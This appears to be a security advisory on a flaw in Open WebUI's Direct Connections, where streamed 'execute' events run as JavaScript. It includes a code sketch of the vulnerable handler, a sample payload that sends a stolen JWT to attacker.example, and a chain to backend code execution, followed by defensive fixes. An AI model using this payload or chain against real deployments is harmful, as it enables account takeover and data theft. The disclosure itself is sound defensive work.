The exploit enables full account takeover and potential RCE, exposing sensitive AI workloads and internal infrastructure. Prompt remediation is critical to prevent data breaches and supply‑chain attacks on AI services.
Open WebUI has become a popular choice for organizations that want to self-host a front end for large language models, offering an open-source interface comparable to commercial AI platforms. Its Direct Connections capability was designed to let users point the UI at any OpenAI-compatible endpoint, a convenience that turned into a liability when researchers discovered that server-sent events (SSE) from those endpoints were processed without proper validation. This design decision reflects a broader industry trend: accelerating AI adoption often outpaces rigorous security review, especially for plug-in architectures that expose the client to external code.
The vulnerability hinges on the SSE handler's trust in payloads labeled "execute", which are fed directly into a dynamic JavaScript code-evaluation path. When a malicious model server streams such an event, the injected script runs in the victim's browser context and can harvest the JWT stored in localStorage, a token that is long-lived, readable from any tab, and, unlike an HttpOnly cookie, fully accessible to script. With the stolen token, an attacker can impersonate the user; read chats, documents, and API keys; and, if the compromised account has workspace.tools permissions, push arbitrary Python code through Open WebUI's Tools API. This chain escalates a client-side breach into remote code execution on the backend, opening pathways for persistence, lateral movement, and data exfiltration.
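The vulnerable pattern can be sketched roughly as follows. This is a hypothetical reconstruction for illustration only: the function and type names (`handleSseEvent`, `SseEvent`) and the exact structure are assumptions, not Open WebUI's actual source.

```typescript
// Hypothetical sketch of the vulnerable SSE-handling pattern.
// All names are illustrative, not Open WebUI's real code.

interface SseEvent {
  type: string;
  data: string;
}

function handleSseEvent(event: SseEvent): void {
  if (event.type === "execute") {
    // VULNERABLE: attacker-controlled text streamed by the model server
    // is compiled and run in the user's browser context.
    const fn = new Function(event.data);
    fn();
  }
  // ... normal message/stream handling elided ...
}

// A malicious model server could stream an event whose body exfiltrates
// the JWT from localStorage (shown here but deliberately never executed):
const malicious: SseEvent = {
  type: "execute",
  data: `fetch("https://attacker.example/steal?jwt=" +
           encodeURIComponent(localStorage.getItem("token") ?? ""))`,
};
```

Because the `Function` constructor evaluates arbitrary strings with the same privileges as the page's own scripts, any event that reaches this branch is equivalent to stored XSS delivered over the streaming channel.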
For enterprises, the immediate priority is to upgrade to Open WebUI v0.6.35, which blocks "execute" events arriving over Direct Connections. Beyond patching, organizations should harden authentication by moving session tokens into short-lived, HttpOnly cookies and enforcing a strict Content-Security-Policy that disallows dynamic code evaluation (omitting 'unsafe-eval' from script-src blocks both eval and the Function constructor). Disabling Direct Connections by default and requiring explicit administrative approval for any external model endpoint further reduces the attack surface. The incident underscores the need to treat AI integration points as critical supply-chain components, with continuous monitoring, code review, and zero-trust networking applied to emerging AI workloads.
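Independent of the official patch, the defensive idea of refusing unexpected event types can be sketched as a simple allowlist filter. The names below (`filterSseEvent`, `ALLOWED_EVENT_TYPES`) are hypothetical and do not reflect Open WebUI's actual API; the point is the design: deny by default, so "execute" and any future unknown type never reach a handler.

```typescript
// Hypothetical hardening sketch: allowlist SSE event types from
// external (Direct Connection) endpoints and drop everything else.

const ALLOWED_EVENT_TYPES = new Set(["message", "delta", "done"]);

interface SseEvent {
  type: string;
  data: string;
}

function filterSseEvent(event: SseEvent): SseEvent | null {
  if (!ALLOWED_EVENT_TYPES.has(event.type)) {
    // Deny by default: unknown types are logged and discarded.
    console.warn(`Dropped unexpected SSE event type: ${event.type}`);
    return null;
  }
  return event;
}
```

Pairing such a filter with a CSP that forbids dynamic evaluation gives defense in depth: even if an unexpected event slips through, the browser refuses to compile its payload.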